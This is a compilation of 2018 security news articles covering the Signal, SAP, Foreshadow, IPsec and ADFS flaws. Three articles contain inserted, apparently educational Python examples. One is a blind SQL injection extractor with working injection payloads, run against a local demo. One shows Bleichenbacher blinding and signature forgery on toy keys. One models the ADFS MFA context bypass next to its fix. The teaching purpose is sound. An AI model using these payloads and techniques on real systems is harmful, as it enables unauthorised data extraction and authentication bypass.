An Italian cybersecurity enthusiast discovered that it was possible to recover expired messages from Signal Desktop version 1.14.3.
Advisory ID: n0sign4l-002
Risk level: 4 / 5
Title: Signal Desktop – Recover Expired Messages
Credit: Leonardo Porpora – ‘n0sign4l’
Product: Signal
CVE: CVE-2018-14023
Version: 1.14.3 and prior
Public Disclosure: 17/08/2018
Vendor: Open Whisper Systems
Details
Signal version 1.14.3 was vulnerable to the recovery of expired messages.
When I reported the vulnerability to the Signal security team, they fixed it in a very short time, but the fix was partial: version 1.14.4 fixed one vulnerability but was still vulnerable to a different attack. I reported the new issue to the security team and version 1.15.0-beta.10 finally addressed the problem.

Everything started from a message that was not cleared from the preview of Signal Desktop:

Signal bug

So I said this message must be stored somewhere… I tried to dump the memory and BOOM 🙂 the message was still there. Messages were stored in the log (I think to double check that they are actually deleted) but they were not cleared by a garbage collector or anything else, so I was able to recover them.
Signal bug 2
Version 1.14.4 fixed this issue, but I wanted to check whether it was still possible to recover messages from the logs, and they were still there. The issue was related to IndexedDB not deleting messages predictably.

Below is a video PoC of the vulnerability:

Solution:
Update Signal to version 1.15.0-beta.10.
Final thoughts:
I am very happy to have contributed to the security of Signal, an application that I use every day to talk with my friends, professors…

My contribution was also possible because this is an open-source project: beyond just reporting the security hole, I had the opportunity to analyze the source code and highlight the flaw.

This is a small example of how effective the open-source model is, and I hope everyone can understand the benefits of community contribution in the data protection field, so that everybody can contribute.

Sorry I can not hear you, there’s interference

n0sign4l 🙂
About the author Leonardo Porpora
I am 17 years old, and since I started dealing with informatics and cybersecurity I have been inspired by E. Snowden’s character, bravery and values, even when he faced hard consequences for his actions. To me he is a really special person and I consider him like a brother.
Defending human rights, and privacy in particular, is a must in a democratic society, and for this reason, in my opinion, everybody should use the Signal messaging application for their communications.
Original post @ http://n0sign4l.blogspot.com/2018/08/advisory-id-n0sign4l-002-risk-level-4-5.html


SAP Security Notes August 2018, watch out for SQL Injection
16.8.2018 securityaffairs
Vulnerebility

SAP released its security notes for August 2018, which include over two dozen patches; the good news is that none of them address critical vulnerabilities.
SAP issued 27 Security Notes, including 14 Patch Day Notes and 13 Support Package Notes. Seven of them are updates to previously published patches.

“On 14th of August 2018, SAP Security Patch Day saw the release of 12 Security Notes. Additionally, there were 2 updates to previously released security notes.” reads the advisory published by SAP.

The most common vulnerability types fixed by this month’s SAP security notes are SQL injection and information disclosure flaws, as shown in the following graph.

SAP security notes August 2018

According to experts from ERPScan, Implementation Flaw and Missing Authorization Check are the largest categories in August by number of vulnerabilities.

SAP security notes August 2018

SAP addressed nine high severity flaws, including two SQL injection vulnerabilities in SAP BusinessObjects that could be exploited by an attacker to extract information from a vulnerable system.

The SQL injection issues were reported by the researchers at the security firm Onapsis that shared technical details of the flaws in a blog post.
“Two of these High Priority notes concern vulnerabilities reported by Onapsis Research Labs: one fixes two SQL Injection vulnerabilities in SAP BusinessObjects. Basically, an attacker with a low privileges session can inject data and extract information that he should not be able to. The other vulnerability fixes two bugs found in SAP HANA XSA.” reads the blog post published by Onapsis.

“Another High Priority Note reported by the Onapsis Research Labs, #2644154, is tagged with a CVSS v3 base score: 7.7/10. It fixes two SQL-injection (SQLi) vulnerabilities found in SAP BusinessObjects (BOBJ) by Onapsis researcher Gaston Traberg. The issues were found in the frontend webserver of the Central Management Console (CMC). One of these SQLi is a blind boolean-based SQLi, and the other a regular SQLi vulnerability.”

Security experts from ERPScan also published an interesting analysis of the security patches rolled out by SAP.
ERPScan focused its analysis on the most serious vulnerabilities, all rated “high severity,” including the two SQL injection flaws found by Onapsis in BusinessObjects (CVE-2018-2447).

Other high severity flaws are a missing authorization check in the SAP SRM MDM Catalog (CVE-2018-2449) and a memory corruption flaw in the BusinessObjects Business Intelligence platform (CVE-2015-5237) that can be exploited by attackers to run arbitrary commands on vulnerable systems.
“An attacker can use [CVE-2018-2449] vulnerability to access a service without any authorization procedures and to use service functionality that has restricted access. This can lead to an information disclosure, privilege escalation, and other attacks,” states ERPScan.

“An attacker can use [CVE-2018-2447] vulnerability with a help of specially crafted SQL queries. He or she can read and modify sensitive information in a database, execute administration operations, destroy data or make it unavailable. In some cases, the hacker can access system data or execute OS commands. Install this SAP Security Note to prevent the risks”


Foreshadow/L1TF: What You Need to Know
15.8.2018 securityweek
Vulnerebility

The details of three new speculative execution vulnerabilities affecting Intel Xeon and Core processors were disclosed on Tuesday. The flaws have been dubbed Foreshadow and L1 Terminal Fault (L1TF), and patches and mitigations are already available.

The security holes were discovered independently by two teams of researchers. A team from KU Leuven, a university in Belgium, informed Intel of its findings on January 3, the day when the notorious Spectre and Meltdown vulnerabilities were disclosed to the public. The second team, comprising researchers from Israel-based Technion, University of Michigan, the University of Adelaide in Australia, and Australia-based CSIRO's Data61, reported its findings to Intel on January 23.

The Foreshadow/L1TF vulnerabilities are CVE-2018-3615, which impacts Intel’s Software Guard Extensions (SGX); CVE-2018-3620, which impacts operating systems and System Management Mode (SMM); and CVE-2018-3646, which affects virtualization software and Virtual Machine Monitors (VMM).

Researchers first discovered the vulnerability affecting SGX, a feature in Intel processors designed to protect user data even if an attacker takes control of the entire system. SGX was believed to be resilient to speculative execution attacks, but experts have now demonstrated that an attacker can read memory protected by SGX.

“Making things worse, due to SGX’s privacy features, an attestation report cannot be linked to the identity of its signer. Thus, it only takes a single compromised SGX machine to erode trust in the entire SGX ecosystem,” researchers explained on a website set up for the Foreshadow vulnerabilities.

During its investigation into the cause of Foreshadow, Intel discovered the two other flaws, which are tracked as Foreshadow-Next Generation (NG). Foreshadow-NG attacks can allow malicious actors to read information from the L1 cache, including information associated with the SMM, the operating system’s kernel, and hypervisors.

“Perhaps most devastating, Foreshadow-NG might also be used to read information stored in other virtual machines running on the same third-party cloud, presenting a risk to cloud infrastructure,” researchers said. “Finally, in some cases, Foreshadow-NG might bypass previous mitigations against speculative execution attacks, including countermeasures to Meltdown and Spectre.”

According to Intel, a malicious application installed on the targeted system can deduce data values from the operating system or other apps. Exploitation of the flaws can also allow a malicious guest VM to obtain data in the memory of the virtual machine manager (VMM) or other guest VMs.

Intel also says that the Foreshadow vulnerabilities allow malicious software to obtain data from the SMM memory. Finally, malware running outside or within an SGX enclave may be able to access data from another SGX enclave.

Intel and other tech giants have released updates and mitigations which, in combination with the patches released previously for speculative execution vulnerabilities (e.g. Meltdown and Spectre), should prevent attacks. Intel claims it has not seen any significant performance impact introduced by the available mitigations, either on PCs or data center workloads.

There is no evidence of malicious attacks exploiting these vulnerabilities.

Companies respond to Foreshadow

Microsoft has published both a security advisory describing the flaws and a blog post containing technical details. The company says it has released several updates that should mitigate Foreshadow on both consumer devices and on its Azure cloud services.

Google also says it has deployed mitigations to its infrastructure, including for the infrastructure that underpins its cloud services.

Amazon Web Services (AWS) told customers that its infrastructure includes protections for these types of attacks, and additional security mechanisms have been deployed for L1TF. “All EC2 host infrastructure has been updated with these new protections, and no customer action is required at the infrastructure level,” AWS said.

Oracle has also published a blog post describing which of its products are impacted and which are not, and provided instructions on how attacks can be mitigated.

VMware has published separate advisories for CVE-2018-3646 and CVE-2018-3620. The former affects VMware vSphere, Workstation, and Fusion, and the company says it has released updates that patch the issue. The latter impacts vCloud Usage Meter (UM), Identity Manager (vIDM), vCenter Server (vCSA), vSphere Data Protection (VDP), vSphere Integrated Containers (VIC) and vRealize Automation (vRA). Patches are pending for this vulnerability, but virtual appliance mitigations are available.

Cisco is also working on patches for the vulnerabilities. The networking giant says that while its products are not directly affected, they could still be targeted if the hosting environment is vulnerable.

“Cisco recommends that customers harden their virtual environments, tightly control user access, and ensure that all security updates are installed. Customers who are deploying products as a virtual device in multi-tenant hosting environments should ensure that the underlying hardware, as well as the operating system or hypervisor, is patched against the vulnerabilities in question,” the company said.

The Xen Project revealed that systems running any version of Xen are impacted.

“New microcode, and possibly a new firmware image is required to prevent SMM data from being leaked with this vulnerability,” Xen developers explained. “Software updates to Xen (details below) are required to prevent guests from being able to leak data belonging to Xen or to other guests in the system.”

Red Hat has published both technical and high level materials describing the Foreshadow flaws. The company is working on updates that should make it easier for its users to implement mitigations.

The list of Linux distributions that have also published advisories includes Suse, Debian, Gentoo and Ubuntu.


SAP Releases August 2018 Security Updates
15.8.2018 securityweek
Vulnerebility

SAP on Tuesday released its security updates for August 2018. The latest round of updates includes over two dozen patches, but none of them are for critical (hot news) vulnerabilities.

The German software giant has provided 27 SAP Security Notes, including 14 Patch Day Notes and 13 Support Package Notes. Seven of the total are updates to previously published patches.

SAP releases security updates for August 2018

Nine of the patches address high severity flaws, including two discovered by researchers at Onapsis, a company that specializes in securing Oracle and SAP applications.

“One [Security Note] fixes two SQL Injection vulnerabilities in SAP BusinessObjects. Basically, an attacker with a low privileges session can inject data and extract information that he should not be able to. The other vulnerability fixes two bugs found in SAP HANA XSA,” Onapsis said in a blog post detailing this month’s patches.

“The [SQL injection] issues were found in the frontend webserver of the Central Management Console (CMC). One of these SQLi is a blind boolean-based SQLi, and the other a regular SQLi vulnerability,” the company added. “These SQLi vulnerabilities [...] allow an attacker without privileges to get information from the Central Management Server System Database. As described, it is sensitive infrastructure information related to the BusinessObjects Enterprise platform, its structure and configuration.”
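Both this quote and the earlier SAP Security Notes article above describe one of the BusinessObjects CMC bugs as blind boolean-based: the application never echoes query results, only whether a lookup matched. The added example below (my code, not Onapsis’ or SAP’s) shows why that is enough to read a database. The table, column names and stored secret are constructed, and an in-memory SQLite database stands in for the CMS system database; it demonstrates the technique, not the BusinessObjects code itself.

```python
"""Boolean-based blind SQL injection against a lookup that answers only
'found' or 'not found', beside the parameterised query that is immune.

Added example, mine rather than Onapsis' or SAP's. The table, the column
names and the stored secret are constructed, and an in-memory SQLite
database stands in for the CMS system database; it demonstrates the
technique the notes describe, not the BusinessObjects code itself.
"""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cms_nodes (id INTEGER PRIMARY KEY, name TEXT, admin_secret TEXT)")
    db.execute("INSERT INTO cms_nodes VALUES (1, 'cms-node-1', 'bo-admin-pw')")  # constructed row
    return db


def node_exists_vulnerable(db, name):
    """String concatenation: the caller's text is pasted into the SQL."""
    row = db.execute(f"SELECT id FROM cms_nodes WHERE name = '{name}'").fetchone()
    return row is not None


def node_exists_safe(db, name):
    """Bound parameter: the text is always data, never SQL."""
    row = db.execute("SELECT id FROM cms_nodes WHERE name = ?", (name,)).fetchone()
    return row is not None


SECRET = "(SELECT admin_secret FROM cms_nodes WHERE id = 1)"


def extract_secret_blind(oracle, max_len=64):
    """Recover the secret a character at a time from yes/no answers only.

    ``oracle(text)`` returns True when the lookup matched. Each payload
    closes the quoted literal, ORs in a condition about the secret and
    comments out the rest of the original statement. A binary search on
    the code point of each character costs about seven queries per
    character: a blind SQLi is slower than a regular one, not weaker.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"x' OR length({SECRET}) >= {pos} -- "):
            break                          # past the last character
        lo, hi = 0, 0x7F
        while lo < hi:                     # find the smallest v with char <= v
            mid = (lo + hi) // 2
            if oracle(f"x' OR unicode(substr({SECRET}, {pos}, 1)) > {mid} -- "):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", extract_secret_blind(lambda t: node_exists_vulnerable(db, t)))
    print("parameterised:", repr(extract_secret_blind(lambda t: node_exists_safe(db, t))))
```

Against the parameterised lookup the same payloads are simply a name that does not exist, so the extraction loop stops at the first probe with nothing recovered; the fix is the bound parameter, not filtering quotes out of the input.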

ERPScan, another company specializing in securing SAP applications, noted that six of the flaws resolved in the past month are implementation issues, while another six have been described as missing authorization checks.

ERPScan has provided a brief description for three of the most serious vulnerabilities patched by SAP with the August updates. The security holes, all rated “high severity,” include the SQL injection flaws found by Onapsis in BusinessObjects (CVE-2018-2447), a missing authorization check in the SAP SRM MDM Catalog (CVE-2018-2449), and a memory corruption flaw in the BusinessObjects Business Intelligence platform that can lead to arbitrary command execution (CVE-2015-5237).

“An attacker can use [CVE-2018-2449] to access a service without any authorization procedures and to use service functionality that has restricted access. This can lead to an information disclosure, privilege escalation, and other attacks,” ERPScan said.


Microsoft Patches Zero-Day Flaws in Windows, Internet Explorer
15.8.2018 securityweek
Vulnerebility

Microsoft’s Patch Tuesday updates for August 2018 address 60 vulnerabilities, including two zero-day flaws affecting Windows and Internet Explorer.

One of the actively exploited vulnerabilities is CVE-2018-8414, which Microsoft learned of from Matt Nelson of SpecterOps. Nelson disclosed the details of the bug in June after Microsoft told him that “the severity of the issue is below the bar for servicing and that the case will be closed.”

Proofpoint then revealed in July that a financially-motivated threat actor tracked by the company as TA505 had been exploiting the flaw to deliver the FlawedAmmyy RAT.

Microsoft described the issue as a Windows Shell remote code execution vulnerability that can be exploited by getting the targeted user to open a specially crafted file. The company says the flaw impacts Windows 10 and Windows Server (versions 1709 and 1803).

According to Trend Micro’s Zero Day Initiative (ZDI), the same vulnerability also impacts Adobe Acrobat Reader. ZDI researcher Abdul-Aziz Hariri reported the weakness to Adobe, which also released a patch for it on Tuesday.

“The Acrobat patch blocks the embedding of certain files types – a tactic Microsoft has already done with Office 365 docs,” ZDI explained in a blog post published after the patches were released. “This [Microsoft] patch prevents the bypassing of traditional file execution restrictions within Windows. It’s fascinating to see exploit authors combine different products to evade detection and proliferate their malware.”

The second zero-day vulnerability patched on Tuesday by Microsoft is CVE-2018-8373, a remote code execution flaw that exists due to how the scripting engine in Internet Explorer handles objects in memory.

The security hole was reported to Microsoft by Elliot Cao of Trend Micro Security Research, but Trend Micro has yet to make any information public on the attacks it has seen.

On the other hand, the security firm did reveal that CVE-2018-8373 is very similar to CVE-2018-8174, which Microsoft patched in May. CVE-2018-8174 had been exploited by an unnamed advanced persistent threat (APT) actor when it was fixed.

“[The vulnerability] used a new UAF vulnerability in vbscript.dll. This UAF occurs when the VBScript engine uses AssignVar to assign a value to the element of an array accessed by AccessArray,” ZDI explained. “Interestingly, the previous CVE was also being actively exploited when patched. In other words, if there are similar bugs to this one, they will likely be found and exploited, too.”

A total of 20 vulnerabilities patched this month by Microsoft have been rated “critical” and, unsurprisingly, many of them impact Edge and Internet Explorer. Remote code execution flaws discovered in SQL Server, Exchange, and Windows have also been assigned a “critical” severity rating.

Some of the more interesting vulnerabilities patched by Microsoft this month, whose details were disclosed shortly after the tech giant pushed out the security updates, include an Active Directory Federation Services (ADFS) issue discovered by Okta and an Exchange RCE flaw reported by an anonymous researcher through ZDI.


DoD Launches 'Hack the Marine Corps' Bug Bounty Program
15.8.2018 securityweek
Vulnerebility

The U.S. Department of Defense on Monday announced the launch of “Hack the Marine Corps,” the U.S. military’s sixth bug bounty program.

Similar to previous programs run by the Pentagon, Hack the Marine Corps is hosted by bug bounty platform HackerOne.

The goal of the bug bounty program, scheduled to run until August 26, is to help the Marine Corps improve the security of the Marine Corps Enterprise Network (MCEN), which is part of the DoD Information Network (DoDIN). The initiative will focus on the organization’s public websites and services.

Hack the Marine Corps kicked off at the DEF CON security conference in Las Vegas, where nearly 100 white hat hackers handpicked by the DoD attempted to find vulnerabilities for nine straight hours.

In this phase of the program, researchers earned more than $80,000 for finding 75 unique vulnerabilities.

“Hack the Marine Corps allows us to leverage the talents of the global ethical hacker community to take an honest, hard look at our current cybersecurity posture,” said Maj. Gen. Matthew Glavy, Commander of the U.S. Marine Corps Forces Cyberspace Command. “Our Marines need to operate against the best. What we learn from this program will assist the Marine Corps in improving our warfighting platform, the Marine Corps Enterprise Network. Working with the ethical hacker community provides us with a large return on investment to identify and mitigate current critical vulnerabilities, reduce attack surfaces, and minimize future vulnerabilities. It will make us more combat ready.”

Hack the Marine Corps was implemented with the help of Jack Cable, an 18-year-old who won the Hack the Air Force challenge. Cable has joined the Pentagon’s Defense Digital Service (DDS) for a tour of duty following his success in the previous bug bounty program.

The DoD launched its first bug bounty program, Hack the Pentagon, in May 2016. As a result of that program’s success, the organization decided to launch Hack the Army, Hack the Air Force, Hack the Air Force 2.0, and Hack the Defense Travel System.

Roughly 5,000 vulnerabilities were disclosed to the Pentagon as part of these programs, with ethical hackers earning hundreds of thousands of dollars for their work.


Crypto Flaw Affects Products From Cisco, Huawei, ZyXEL
15.8.2018 securityweek
Vulnerebility

A team of researchers has disclosed the details of a new attack method that can be used to crack encrypted communications. The products of several vendors, including Cisco, Huawei, ZyXEL and Clavister, are impacted.

The attack will be presented later this week at the 27th USENIX Security Symposium in Baltimore, Maryland, by researchers from the University of Opole in Poland and the Ruhr-University Bochum in Germany. The research paper has already been made public.

The experts have analyzed the impact of key reuse on Internet Protocol Security (IPsec), a protocol that authenticates and encrypts the data packets sent over a network. IPsec is often used for virtual private networks (VPNs).

IPsec keys are negotiated with the Internet Key Exchange (IKE) protocol, which exists in two versions, IKEv1 and IKEv2. Each version has several modes, configurations and authentication methods.

“[Reusing] a key pair across different versions and modes of IKE can lead to cross-protocol authentication bypasses, enabling the impersonation of a victim host or network by attackers,” the researchers explained. “We exploit a Bleichenbacher oracle in an IKEv1 mode, where RSA encrypted nonces are used for authentication. Using this exploit, we break these RSA encryption based modes, and in addition break RSA signature based authentication in both IKEv1 and IKEv2. Additionally, we describe an offline dictionary attack against the PSK (Pre-Shared Key) based IKE modes, thus covering all available authentication mechanisms of IKE.”
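The chain the researchers describe, as an added example rather than the paper’s or any vendor’s code: the IKEv1 responder decrypts an RSA-encrypted nonce and leaks only whether the PKCS#1 v1.5 padding was well-formed, which is a Bleichenbacher oracle; the first (blinding) step of that attack is implemented below, and the remaining steps turn the oracle into the private-key operation x^d mod n on any chosen x. Because signing is that same operation under a reused key pair, the forged-signature step shows why the signature-authenticated modes fall too. The 384-bit key, the SHA-1 DigestInfo, the seeds and the nonce are toy assumptions chosen so the script finishes in seconds; real devices use none of them.

```python
"""Why a PKCS#1 v1.5 padding oracle in IKEv1's RSA-encrypted-nonce mode also
breaks RSA signature authentication when the same key pair is reused.

Added example; not code from the paper's authors or from any vendor. The
IKEv1 responder is modelled as a function that decrypts the initiator's
encrypted nonce and leaks only whether the padding was well-formed. The
384-bit key, the SHA-1 DigestInfo, the seeds and the nonce are toy choices
(assumptions) so the script finishes in seconds; real devices use none.
"""
import hashlib
import random

E = 65537
# DER DigestInfo prefix for SHA-1 (RFC 8017, Appendix B.2), used only because
# SHA-256's 51-byte encoding would not fit in a 48-byte toy modulus.
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")


def _probable_prime(n, rng, rounds=20):
    """Miller-Rabin primality test; adequate for a demonstration key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _gen_prime(bits, rng):
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _probable_prime(cand, rng):
            return cand


def make_key(bits=384, seed=7):
    """Toy RSA key pair (n, e, d); 384 bits is far below any safe size."""
    rng = random.Random(seed)
    while True:
        p, q = _gen_prime(bits // 2, rng), _gen_prime(bits // 2, rng)
        phi = (p - 1) * (q - 1)
        if p != q and phi % E:
            return p * q, E, pow(E, -1, phi)


def _klen(n):
    return (n.bit_length() + 7) // 8


def encrypt_nonce(n, e, nonce, seed=1):
    """Initiator: PKCS#1 v1.5 type-2 encryption of the nonce to the responder's key."""
    rng = random.Random(seed)
    ps = bytes(rng.randrange(1, 256) for _ in range(_klen(n) - 3 - len(nonce)))
    em = b"\x00\x02" + ps + b"\x00" + nonce
    return pow(int.from_bytes(em, "big"), e, n)


def responder_oracle(n, d, c):
    """Responder: decrypts and reveals only whether the block starts 00 02.
    A distinguishable error or timing difference is all the attacker needs."""
    em = pow(c, d, n).to_bytes(_klen(n), "big")
    return em[:2] == b"\x00\x02"


def blinding_step(n, e, c, oracle, seed=2, limit=400_000):
    """Step 1 of Bleichenbacher's attack: try random s0 until c * s0^e is
    PKCS-conforming. Every 'yes' tells the attacker 2B <= m*s0 mod n < 3B
    (B = 2^(8(k-2))), the interval the remaining steps narrow down to m.
    Returns s0, or None if the limit is hit."""
    rng = random.Random(seed)
    for _ in range(limit):
        s0 = rng.randrange(2, n)
        if oracle(c * pow(s0, e, n) % n):
            return s0
    return None


def _sig_encoding(n, msg):
    """PKCS#1 v1.5 type-1 encoding used on the signature side."""
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    return b"\x00\x01" + b"\xff" * (_klen(n) - 3 - len(t)) + b"\x00" + t


def sign(n, d, msg):
    """Signing is the same private-key operation x^d mod n as decryption."""
    return pow(int.from_bytes(_sig_encoding(n, msg), "big"), d, n)


def verify(n, e, msg, sig):
    return pow(sig, e, n).to_bytes(_klen(n), "big") == _sig_encoding(n, msg)


def forge_signature(n, private_op, msg):
    """The cross-protocol bypass. A completed Bleichenbacher attack lets the
    attacker evaluate x -> x^d mod n for any x; private_op stands in for that
    capability (this script stops after the blinding step). Applied to the
    type-1 encoding of a chosen message, the decryption oracle hands back a
    valid signature under the reused key, breaking the signature modes."""
    return private_op(int.from_bytes(_sig_encoding(n, msg), "big"))


if __name__ == "__main__":
    n, e, d = make_key()
    c = encrypt_nonce(n, e, b"initiator-nonce!")
    s0 = blinding_step(n, e, c, lambda x: responder_oracle(n, d, x))
    print("blinding factor found:", s0 is not None)
    forged = forge_signature(n, lambda x: pow(x, d, n), b"attacker-chosen identity")
    print("forged signature verifies:", verify(n, e, b"attacker-chosen identity", forged))
```

The blinding search needs on the order of 2^15 to 2^16 oracle queries because only a 1-in-65536 slice of the modulus starts with 00 02; that volume of IKE handshakes is exactly what the vendors’ advisories describe as the attack traffic. The remedy is the one the paper gives: never share one RSA key pair between an encryption-based and a signature-based IKE mode, and make the responder’s handling of bad padding indistinguishable from good.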

The attack has been found to work against Cisco (CVE-2018-0131), Huawei (CVE-2017-17305), ZyXEL (CVE-2018-9129) and Clavister (CVE-2018-8753) products.

Cisco, Huawei and ZyXEL published advisories for this vulnerability on Monday. Clavister, a provider of network security solutions, released patches for its Clavister cOS Core operating system in early May.

Cisco, which assigned the issue a severity rating of “medium,” described it as a vulnerability in the implementation of RSA-encrypted nonces in the company’s IOS and IOS XE software. An unauthenticated attacker can remotely obtain the encrypted nonces of an IKEv1 session by sending specially crafted ciphertexts to the targeted device.

ZyXEL says the vulnerability affects its ZyWALL and USG series network security appliances. The company has released firmware updates that should prevent attacks.

“ZyWALL/USG devices have a security vulnerability in the Internet Key Exchange (IKE) handshake implementation used for their IPsec-based VPN connections. Attackers might be able to use this vulnerability to retrieve IKEv1 session keys and decrypt connections by using a chosen-ciphertext attack called Bleichenbacher's attack,” the company told customers.

Huawei’s advisory reveals that the company’s firewall products are affected by the vulnerability. The company also noted that the IPsec IKEv1 implementations in its firewalls introduce two other flaws that can be used to cause a device to enter a denial-of-service (DoS) condition by sending specially crafted packets.


Adobe Patches 11 Flaws Across Four Products
15.8.2018 securityweek
Vulnerebility

The Patch Tuesday updates released by Adobe for August 2018 address nearly a dozen vulnerabilities in Flash Player, the Creative Cloud Desktop Application, Experience Manager, and Acrobat and Reader.

Five security holes have been fixed by the company in Flash Player, but none of them appear too serious. The company described the bugs fixed with the release of version 30.0.0.154 as “important” out-of-bounds read and security feature bypass issues that can lead to information disclosure.

One of the flaws, reported by Kai Song from Tencent, is a privilege escalation that can lead to arbitrary code execution, but its severity rating is also only “important.”

Adobe fixed two vulnerabilities in Acrobat and Reader for Windows and macOS. Both are considered “critical” and they both allow code execution.

In the Creative Cloud Desktop Application installer for Windows, the company resolved a DLL hijacking issue that can lead to privilege escalation.

Finally, patches released by Adobe for its Experience Manager product address two cross-site scripting (XSS) flaws that can result in information disclosure, and one input validation bypass vulnerability that can allow an attacker to modify information. All of these bugs have been assigned “moderate” severity ratings.

Adobe says it’s not aware of in-the-wild exploits for any of the vulnerabilities patched with this month’s updates. The company has assigned priority ratings of “2” to a majority of the flaws, which means the company does not expect to see malicious exploitation attempts any time soon.

Last month, researchers claimed they had found a potentially serious security issue in Adobe’s internal systems, but the company downplayed the impact of the vulnerability saying it was only an XSS flaw.


Vulnerability Could Allow Insider to Bypass CEO's Multi-Factor Authentication
15.8.2018 securityweek
Vulnerebility

Vulnerability Allows a Second Factor for One Account to be Used for All Accounts in an Organization

A simple vulnerability in Microsoft's Active Directory Federation Services (ADFS) can lead to catastrophic results. The flaw (CVE-2018-8340) was discovered by Okta researcher Andrew Lee and patched by Microsoft in this month's Patch Tuesday security updates.

ADFS is used by third-party vendors such as Okta, Gemalto, Duo, Authlogics, RSA, and SecureAuth; it allows companies to add multi-factor authentication to their security controls. Exploiting the vulnerability allows any attacker who holds a valid second factor to access any other user's account, provided they can obtain that user's credentials. The flaw affects all third-party MFA vendors that use Microsoft's ADFS.

The attacker obviously has some work to do, but it is not that difficult. An insider would already have one part: his or her own valid 2FA token. With that, he or she could access any other employee's account by phishing that employee's username and password and combining them with his or her own MFA token.

In reality, 2FA is not always difficult to crack. Earlier this month it was disclosed that Reddit had suffered a breach following an SMS intercept that gained one user's SMS token. Alternatively, an attacker could phish for, or use a stolen database to gain ID and password, and then social engineer the help desk to reset the second factor. If he can log on as a user or process that has not yet been supplied with a second factor, then he might simply and automatically be granted one.

With just one full set of credentials (username, password and the second factor), an external attacker could phish for any other user's credentials and gain access without that user's second factor. If he manages to phish an admin, he has immediately hit the jackpot.

But even with lower privileges he will gain basic access to the network and can start looking for higher privileges. If he finds an admin password, this flaw will allow him to bypass any installed 2FA controls associated with the privileged account.

The flaw lies in the way in which ADFS communicates with the login process. The attacker will attempt to log in at the AD login page using two separate browsers -- one for each account. He then observes the authentication flow for each login, looking for the MFA Context and the MFA token for each user. The Context is labeled such in the page's HTML, while the MFA token appears in a script just below the context.

"By combining Bob’s MFA Context with Alice’s session cookie," writes Andrew Lee in an associated Okta blog, "the attacker can finish logging in as Alice using Bob’s second factor and MFA Token. The attacker does not need Alice’s second factor to log into her account."

After obtaining the session cookies, MFA Contexts, and MFA Tokens for himself and his target, the attacker first completes second-factor authentication with his owned MFA Token, then sends his MFA Context with his target's session cookie to the AD server. The AD server confirms with the MFA provider that the attacker's token was approved, then it logs the attacker in as the target.

The flaw is really very simple in concept. "The MFA Context contains an encrypted and signed copy of the MFA Token, using the AD server’s certificate/key pair to encrypt and sign," writes Lee. "Therefore the AD server can verify that it issued the MFA Token. However, the AD server does not verify the relationship of the MFA Token to the identity being logged in, allowing the attacker to log in as [the target] using [the attacker's] second factor."

One way to verify that relationship, suggests Okta, would be for Microsoft to include the username in the signed data of the MFA Context.
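The following is an added example, not Microsoft's or Okta's code, that models the logic described above in simplified form: a server-signed MFA Context that carries an MFA Token, a final login step that checks the context against the session cookie's identity, and Okta's suggested fix of binding the username into the signed data. The token format, the HMAC signing in place of the AD server's certificate/key pair, the user names, and all function names are assumptions made for the illustration.

```python
"""Simplified model of the ADFS MFA Context check behind CVE-2018-8340.
Added example, not Microsoft's or Okta's code: the real token format is not
reproduced, only the logic of a server-signed context carrying an MFA token,
with and without the username bound into the signed data."""
import base64
import hashlib
import hmac
import json

# Constructed server signing key; stands in for the AD server's certificate/key pair.
SERVER_KEY = b"constructed-ad-server-signing-key"


def sign_context(payload):
    """Serialize and HMAC-sign a payload; returns 'body.tag' (both base64)."""
    body = json.dumps(payload, sort_keys=True).encode()
    tag = hmac.new(SERVER_KEY, body, hashlib.sha256).digest()
    return "%s.%s" % (base64.urlsafe_b64encode(body).decode(),
                      base64.urlsafe_b64encode(tag).decode())


def verify_context(context):
    """Return the signed payload if the tag is valid, else None."""
    try:
        body_b64, tag_b64 = context.split(".")
        body = base64.urlsafe_b64decode(body_b64)
        tag = base64.urlsafe_b64decode(tag_b64)
    except ValueError:
        return None
    expected = hmac.new(SERVER_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(body)


def forged_context(payload):
    """A context built without the server key (all-zero tag), to show that the
    signature check alone already rejects contexts the server did not issue."""
    body = json.dumps(payload, sort_keys=True).encode()
    return "%s.%s" % (base64.urlsafe_b64encode(body).decode(),
                      base64.urlsafe_b64encode(b"\x00" * 32).decode())


def issue_mfa_context(username, mfa_token, bind_identity):
    """Server issues an MFA Context for a login in progress.
    bind_identity=False models the vulnerable behaviour (only the token is signed);
    bind_identity=True models the suggested fix (the username is part of the signed data)."""
    payload = {"mfa_token": mfa_token}
    if bind_identity:
        payload["user"] = username
    return sign_context(payload)


def complete_login(session_user, mfa_context, approved_tokens, require_binding):
    """Final login step. session_user is the identity of the session cookie presented;
    approved_tokens is the set of MFA tokens the MFA provider has confirmed."""
    ctx = verify_context(mfa_context)
    if ctx is None:
        return False                      # forged or tampered context
    if ctx["mfa_token"] not in approved_tokens:
        return False                      # second factor never completed
    if require_binding and ctx.get("user") != session_user:
        return False                      # token was issued for a different identity
    return True


def demo(bind_identity):
    """Bob's context (issued for bob's login, approved with bob's second factor)
    presented with alice's session. Returns (alice_legit_ok, cross_account_ok)."""
    approved = set()
    bob_ctx = issue_mfa_context("bob", "tok-bob-123", bind_identity)
    approved.add("tok-bob-123")           # bob completes his own second factor
    alice_ctx = issue_mfa_context("alice", "tok-alice-456", bind_identity)
    approved.add("tok-alice-456")         # alice completes hers
    legit = complete_login("alice", alice_ctx, approved, bind_identity)
    cross = complete_login("alice", bob_ctx, approved, bind_identity)
    return legit, cross


if __name__ == "__main__":
    print("unbound context: (alice ok, bob's context accepted for alice) =", demo(False))
    print("bound context:   (alice ok, bob's context accepted for alice) =", demo(True))
```

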